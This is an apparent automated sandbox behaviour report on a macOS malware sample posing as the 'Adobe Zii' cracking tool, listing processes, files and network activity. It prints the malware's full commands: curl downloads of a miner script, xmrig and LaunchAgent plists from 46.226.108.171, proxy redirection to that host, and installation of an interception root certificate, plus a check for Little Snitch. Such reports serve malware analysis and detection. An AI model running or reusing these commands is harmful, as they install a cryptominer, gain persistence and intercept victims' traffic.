Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 595) | Shell command executed: /bin/sh -c cd /tmp && curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh && chmod +x ./uploadminer.sh && ./uploadminer.sh
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 602) | Shell command executed: /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem
Source: /usr/sbin/networksetup (PID: 603) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 605) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 561) | Chmod executable: /bin/chmod -> chmod +x ./uploadminer.sh
Source: /bin/sh (PID: 589) | Chmod executable: /bin/chmod -> chmod +x ./xmrig
Source: /bin/sh (PID: 597) | Chmod executable: /bin/chmod -> chmod +x ./uploadminer.sh
Source: /bin/sh (PID: 614) | Chmod executable: /bin/chmod -> chmod +x ./xmrig
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/bash (PID: 549) | Curl executable: /usr/bin/curl -> curl https://ptpb.pw/jj9a
Source: /bin/sh (PID: 560) | Curl executable: /usr/bin/curl -> curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh
Source: /bin/sh (PID: 571) | Curl executable: /usr/bin/curl -> curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem
Source: /bin/sh (PID: 574) | Curl executable: /usr/bin/curl -> curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
Source: /bin/sh (PID: 575) | Curl executable: /usr/bin/curl -> curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
Source: /bin/sh (PID: 580) | Curl executable: /usr/bin/curl -> curl -o config.json http://46.226.108.171/config.json
Source: /bin/sh (PID: 581) | Curl executable: /usr/bin/curl -> curl -o xmrig http://46.226.108.171/xmrig
Source: /bin/bash (PID: 551) | Curl executable: /usr/bin/curl -> curl 46.226.108.171:80/sample.zip -o sample.zip
Source: /bin/sh (PID: 596) | Curl executable: /usr/bin/curl -> curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh
Source: /bin/sh (PID: 607) | Curl executable: /usr/bin/curl -> curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem
Source: /bin/sh (PID: 608) | Curl executable: /usr/bin/curl -> curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
Source: /bin/sh (PID: 609) | Curl executable: /usr/bin/curl -> curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
Source: /bin/sh (PID: 612) | Curl executable: /usr/bin/curl -> curl -o config.json http://46.226.108.171/config.json
Source: /bin/sh (PID: 613) | Curl executable: /usr/bin/curl -> curl -o xmrig http://46.226.108.171/xmrig
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 555) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 556) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 584) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 585) | Grep executable: /usr/bin/grep -> grep -v grep
Executes the "ps" command used to list the status of processes
Source: /bin/sh (PID: 554) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 558) | Ps executable: /bin/ps -> ps 550
Source: /bin/sh (PID: 583) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 588) | Ps executable: /bin/ps -> ps 579
Executes the "python" command used to interpret Python scripts
Source: /bin/bash (PID: 550) | Python executable: /Library/Frameworks/Python.framework/Versions/2.7/bin/python -> python -
Source: /usr/libexec/xpcproxy (PID: 579) | Python executable: /usr/bin/python -> python -c import sys,base64,warnings warnings.filterwarnings('ignore') exec(base64.b64decode('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
Executes the "security_authtrampoline" command used to authorize execution with root privileges (GUI prompt)
Source: /usr/bin/osascript (PID: 566) | Security_authtrampoline executable: /usr/libexec/security_authtrampoline -> /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 12 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem
Source: /usr/bin/osascript (PID: 602) | Security_authtrampoline executable: /usr/libexec/security_authtrampoline -> /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 12 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem
Explicitly loads/starts launch services
Source: /bin/sh (PID: 576) | Launch agent/daemon loaded: launchctl load -w com.apple.rig.plist
Source: /bin/sh (PID: 578) | Launch agent/daemon loaded: launchctl load -w com.proxy.initialize.plist
Source: /bin/sh (PID: 610) | Launch agent/daemon loaded: launchctl load -w com.apple.rig.plist
Source: /bin/sh (PID: 611) | Launch agent/daemon loaded: launchctl load -w com.proxy.initialize.plist
Opens applications that may be created ones
Source: /bin/bash (PID: 594) | Application opened: open -a sample.app
Reads launchservices plist files
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 563) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/open (PID: 594) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/osascript (PID: 599) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses AppleScript framework/components containing Apple Script related functionalities
Source: /usr/bin/osascript (PID: 563) | AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 563) | AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 599) | AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 599) | AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Source: /usr/bin/osascript (PID: 563) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 563) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 599) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 599) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Writes 64-bit Mach-O files to disk
Source: /usr/bin/curl (PID: 581) | File written: /Users/Shared/xmrig
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/MacOS/Adobe Zii
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/libConfigurer.dylib
Source: /usr/bin/curl (PID: 613) | File written: /Users/Shared/xmrig
Writes FAT Mach-O files to disk
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/libConfigurer.dylib
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/amtlib
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/libConfigurer.dylib
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/amtlib
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/libConfigurer.dylib
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/amtlib
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/amtlib
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/amtlib
Writes ZIP files to disk
Source: /usr/bin/curl (PID: 551) | ZIP file created: /Users/henry/sample.zip
Writes a file containing only its PID
Source: /usr/sbin/networksetup (PID: 567) | File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 567
Source: /usr/sbin/networksetup (PID: 569) | File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 569
Source: /usr/sbin/networksetup (PID: 603) | File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 603
Source: /usr/sbin/networksetup (PID: 605) | File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 605
Writes icon files to disk
Source: /usr/bin/unzip (PID: 592) | File written: /Users/henry/sample/sample.app/Contents/Resources/AppIcon.icns
App bundle is code signed
Source: Submitted file: TnrhsyteX1.app | CodeResources XML file: CodeResources
Source: Submitted file: TnrhsyteX1.app | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.dr | CodeResources XML file: CodeResources
Creates application bundles containing icon files
Source: /usr/bin/unzip (PID: 592) | Icon file created: sample/sample.app/Contents/Resources/AppIcon.icns
Source: /usr/bin/unzip (PID: 592) | Icon file created: sample/__MACOSX/sample.app/Contents/Resources/._AppIcon.icns
Reads data from the local random generator
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) | Random device file read: /dev/urandom
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) | Random device file read: /dev/urandom
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) | Random device file read: /dev/urandom
Source: /usr/bin/osascript (PID: 563) | Random device file read: /dev/random
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) | Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) | Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) | Random device file read: /dev/urandom
Source: /usr/bin/osascript (PID: 599) | Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 563) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 599) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python framework
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python (PID: 550) | Python framework application: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/python (PID: 579) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to disk
Source: /usr/sbin/networksetup (PID: 567) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist-new
Source: /bin/cp (PID: 568) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 569) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist-new
Source: /bin/cp (PID: 570) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/bin/curl (PID: 574) | XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.rig.plist
Source: /usr/bin/curl (PID: 575) | XML plist file created: /Users/henry/Library/LaunchAgents/com.proxy.initialize.plist
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/_CodeSignature/CodeResources
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/Info.plist
Source: /usr/bin/unzip (PID: 592) | Binary plist file created: /Users/henry/sample/sample.app/Contents/Resources/Base.lproj/MainMenu.nib
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/_CodeSignature/CodeResources
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/Info.plist
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/_CodeSignature/CodeResources
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/Info.plist
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/_CodeSignature/CodeResources
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/Info.plist
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/_CodeSignature/CodeResources
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/Resources/Info.plist
Source: /usr/bin/unzip (PID: 592) | XML plist file created: /Users/henry/sample/sample.app/Contents/Info.plist
Source: /bin/cp (PID: 604) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 606) | XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/bin/curl (PID: 608) | XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.rig.plist
Source: /usr/bin/curl (PID: 609) | XML plist file created: /Users/henry/Library/LaunchAgents/com.proxy.initialize.plist

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49236 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49236
Source: unknown | Network traffic detected: HTTP traffic on port 49237 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49237
Source: unknown | Network traffic detected: HTTP traffic on port 49238 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49238
Source: unknown | Network traffic detected: HTTP traffic on port 49239 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49239
Source: unknown | Network traffic detected: HTTP traffic on port 49246 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49246
Source: unknown | Network traffic detected: HTTP traffic on port 49247 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49247
Source: unknown | Network traffic detected: HTTP traffic on port 49248 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49248
Source: unknown | Network traffic detected: HTTP traffic on port 49250 -> 4444
Source: unknown | Network traffic detected: HTTP traffic on port 4444 -> 49250

Language, Device and Operating System Detection:

Reads process information of other processes
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.556 -> queries PID 556
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.555 -> queries PID 555
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.553 -> queries PID 553
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.551 -> queries PID 551
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.550 -> queries PID 550
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.548 -> queries PID 548
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.547 -> queries PID 547
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.546 -> queries PID 546
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.537 -> queries PID 537
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.535 -> queries PID 535
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.529 -> queries PID 529
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.528 -> queries PID 528
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.527 -> queries PID 527
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.499 -> queries PID 499
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.496 -> queries PID 496
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.494 -> queries PID 494
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.493 -> queries PID 493
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.466 -> queries PID 466
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.449 -> queries PID 449
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.413 -> queries PID 413
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.403 -> queries PID 403
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.401 -> queries PID 401
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.400 -> queries PID 400
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.390 -> queries PID 390
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.386 -> queries PID 386
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.379 -> queries PID 379
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.374 -> queries PID 374
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.369 -> queries PID 369
Source: /bin/ps (PID: 554) | Sysctl requested: kern.procargs2 (1.49) only found for 1.49.368 -> queries PID 368
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.367 -> queries PID 367Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.362 -> queries PID 362Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.346 -> queries PID 346Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.344 -> queries PID 344Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.339 -> queries PID 339Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.338 -> queries PID 338Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.322 -> queries PID 322Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.310 -> queries PID 310Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.308 -> queries PID 308Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.305 -> queries PID 305Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.304 -> queries PID 304Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.303 -> queries PID 303Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.302 -> queries PID 302Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.301 -> queries PID 301Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.299 -> queries PID 299Jump to behavior
